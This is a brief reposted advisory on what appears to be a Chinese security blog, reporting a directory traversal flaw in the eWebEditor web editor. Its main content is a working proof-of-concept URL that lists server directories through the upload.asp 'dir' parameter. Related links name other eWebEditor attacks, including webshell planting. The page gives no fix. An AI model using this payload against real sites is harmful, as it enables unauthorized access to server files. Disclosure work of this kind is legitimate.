eWebEditor suffers from a directory traversal vulnerability

2010, February 6, 10:33 AM. oday收藏
Submitted by admin

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: eWebeditor
# Version: all version
#################################################################
# Vulnerability Info:
# Type: Directory Traversal
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com
###################################################################

Tags: ewebeditor

« 上一篇 | 下一篇 »

只显示10条记录相关文章
ewebeditor无后台另类拿站 (浏览: 39742, 评论: 1)
SQL注入eWebEditor数据库 (浏览: 9213, 评论: 0)
eWebEditor 2.8 商业版插一句话木马 (浏览: 9614, 评论: 0)
ewebeditor for php任意文件上传漏洞 (浏览: 12184, 评论: 0)
ewebeditor 5.2 列目录漏洞 (浏览: 9920, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):